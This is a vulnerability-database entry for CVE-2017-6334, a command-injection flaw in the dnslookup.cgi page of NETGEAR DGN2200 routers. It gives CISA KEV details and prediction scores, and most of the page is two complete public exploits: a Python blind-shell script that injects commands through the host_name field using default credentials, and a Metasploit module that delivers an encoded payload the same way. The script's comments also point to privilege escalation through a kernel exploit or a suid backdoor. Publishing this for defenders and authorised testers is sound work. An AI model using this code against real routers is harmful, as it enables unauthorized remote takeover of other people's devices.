CVE-2017-6334
unknown
KEV
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
2.5
Description
dnslookup.cgi on NETGEAR DGN2200 devices with firmware through 10.0.0.50 allows remote authenticated users to execute arbitrary OS commands
CISA KEV
- Vendor
- NETGEAR
- Product
- DGN2200 Devices
- Due date
- 2022-04-15
Predictions
Exploit likelihood
99%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2:
print "./netgearpwn_2.py <router ip>"
return
spawnShell()
def execute(cmd): #Escaping basic sanitization
requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password))
return
def spawnShell():
print "Dropping a shell-like environment (blind OS injection)"
print "To test it type 'reboot'"
while True:
cmd = raw_input("[blind $] ")
execute(cmd)
if __name__ == "__main__":
main()
#2017-02-25 by SivertPL
#Tak, to ja.Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/http'
require "base64"
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "Netgear DGN2200 dnslookup.cgi Command Injection",
'Description' => %q{
This module exploits a command injection vulnerablity in NETGEAR
DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request
with valid login details.
},
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Author' => [
'thecarterb', # Metasploit Module
'SivertPL' # Vuln discovery
],
'DefaultTarget' => 0,
'Privileged' => true,
'Arch' => [ARCH_CMD],
'Targets' => [
[ 'NETGEAR DDGN2200 Router', { } ]
],
'References' =>
[
[ 'EDB', '41459'],
[ 'CVE', '2017-6334']
],
'DisclosureDate' => 'Feb 25 2017',
))
register_options(
[
Opt::RPORT(80),
OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
])
register_advanced_options(
[
OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
])
end
# Requests the login page which tells us the hardware version
def check
res = send_request_cgi({'uri'=>'/'})
if res.nil?
fail_with(Failure::Unreachable, 'Connection timed out.')
end
# Checks for the `WWW-Authenticate` header in the response
if res.headers["WWW-Authenticate"]
data = res.to_s
marker_one = "Basic realm=\"NETGEAR "
marker_two = "\""
model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
vprint_status("Router is a NETGEAR router (#{model})")
model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']
if model_numbers.include?(model)
print_good("Router may be vulnerable (NETGEAR #{model})")
return CheckCode::Detected
else
return CheckCode::Safe
end
else
print_error('Router is not a NETGEAR router')
return CheckCode::Safe
end
end
def exploit
check
# Convert datastores
user = datastore['USERNAME']
pass = datastore['PASSWORD']
hostname = datastore['HOSTNAME']
vprint_status("Using encoder: #{payload.encoder} ")
print_status('Sending payload...')
vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")
creds_combined = Base64.strict_encode64("#{user}:#{pass}")
vprint_status("Encoded authentication: #{creds_combined}")
res = send_request_cgi({
'uri' => '/dnslookup.cgi',
'headers' => {
'Authorization' => "Basic #{creds_combined}"
},
'vars_post' => {
'lookup' => 'Lookup',
'host_name' => hostname + '; ' + payload.encoded
}})
end
endNetgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
References
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.